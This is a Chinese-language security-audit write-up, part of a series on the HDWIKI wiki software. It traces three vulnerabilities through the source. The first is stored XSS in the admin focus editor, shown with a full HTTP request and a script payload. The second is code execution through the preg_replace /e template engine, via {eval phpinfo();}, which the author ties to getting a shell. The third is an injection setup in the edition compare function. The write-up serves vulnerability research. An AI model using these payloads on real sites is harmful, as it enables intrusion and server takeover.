路由通读审计之HDWIKI(5)

$summary与$image被string::hiconv函数进行处理，我们看一下该函数的定义。

只要我们不被正则检测到即可直接return回来。

我们再看一下save_focus_content方法。

这里是插入js数据点。

模板文件：/data/view/admin_focus.tpl.php 将 image字段直接输出出来。

如图：

构造HTTP包：

POST /index.php?admin_focus-edit HTTP/1.1

Host: hdwiki.com

Content-Length: 106

Accept: */*

Origin:

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: ?admin_focus-edit-58

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: PHPSESSID=vpshfq0gnjkf2ko4qdeoaqcjp5; hd_sid=ESCfTk; hd_auth=993bRToK8dVihewqdijd2tsF5fc%2Bcc%2BW8%2FRFsM2MTMtfM%2FJflKkLfGvB2FkvbPl7JhocdUIHk%2B%2F7YqGs5Y9w; hd_querystring=admin_focus-edit-58

Connection: close

did=58&summary=12&image="><script>alert(1)</script>&displayorder=0&editsubmit=true&doctype=3

发送后访问?admin_focus-focuslist进行回显

如图：

这里我们回过头来看一下/lib/template.class.php文件的display方法。

这里直接调用到preg_replace的/e修饰符，preg_replace的第二个参数调用了stripvtag方法，我们看一下这个方法是怎么玩的。

这里只是进行了替换，并不影响我们getshell。

在后台有模板编辑功能，如图：

编辑插入代码：{eval phpinfo();}

结果：

在/control/edition.php文件中的docompare方法。

按照程序作者的猜想应该是：eid只能接收两条数据，然后使用array_slice将这两条数据提取出来。

但，eid不一定只可以插入两条数据，我们可以给他指定第三条第四条第n条数据。

array_slice函数只会截取到前两条数据，这里我们可以将我们的注入代码往前放置，键为0或1往后放即可。

我们看一下get_edition方法的定义。